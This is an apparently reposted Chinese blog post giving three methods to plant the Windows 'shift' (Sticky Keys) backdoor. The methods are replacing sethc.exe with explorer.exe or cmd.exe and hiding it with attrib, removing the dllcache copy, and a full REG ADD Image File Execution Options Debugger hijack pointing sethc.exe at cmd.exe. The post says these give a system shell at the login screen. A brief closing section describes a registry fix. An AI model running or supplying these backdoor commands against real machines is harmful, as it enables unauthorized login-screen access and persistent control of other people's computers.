大家好,又见面了,我是你们的朋友全栈君。
一、如何制作shift后门
方法1
在cmd窗口,敲打命令如下:
copy c:windowsexplorer.exe c:windowssystem32sethc.exe
copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe
attrib c:windowssystem32sethc.exe h
attrib c:windowssystem32dllcachesethc.exe h
用copy命令将explorer.exe复制为setch.exe,这样在登陆界面下连续按5次shift就可以调出程序管理系统了,就获取了系统权限。
(也可以将explorer.exe 改为cmd.exe,这样子这样在登陆界面下连续按5次shift就可以调出cmd命令了,就获取了shell权限。)
方法2
将 C:WINDOWSsystem32dllcachesethc.exe删除,这个文件夹中放着缓存,如果不删除就会自动变回去
找到 C:WINDOWSsystem32cmd.exe 将其复制并将名称更改为 sethc.exe,放回文件夹中
方法3
REG ADD “HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe” /v Debugger /t REG_SZ /d “C:windowssystem32cmd.exe”
命令说明:reg add 是向注册表添加记录,后面跟的是注册表的位置,这里需要注意的是 HKLM 实际上是 HKEY_LOCAL_MACHINE 的缩写。Image File Execution Option 这个目录就是用来设置镜像劫持的,要被劫持的就是命令中的 sethc 粘滞键程序,随后通过 / v 来指定键名,这个键名 debugger 是固定的,然后通过 / t 来指定类型,即 REG_SZ 字符串类型,最后通过 / d 来指定键的值,即被恶意替换的程序,也就是我们的 cmd
修复方法
1,运行“regedit”打开注册表
2,切换该位置HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution
如果该目录下不存在sethc.exe项:
对着Image File Execution 右键 新建项 里面输入sethc.exe
对着新创建的sethc.exe右健,新建,字符串值,Debugger
双击新建的Debugger,在数值数据中填入afafagagag一些你胡乱打的数值
置完后最好设置下权限,Everyone 禁止 删除 禁止 设置项值
如果目录下存在sethc.exe项:
打开sethc.exe项 右面双击 Debugger 里面的内容改成afagagagag之类的(乱打就行),这样就免疫并且清除了 shift后门.
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/192117.html原文链接:https://javaforall.cn
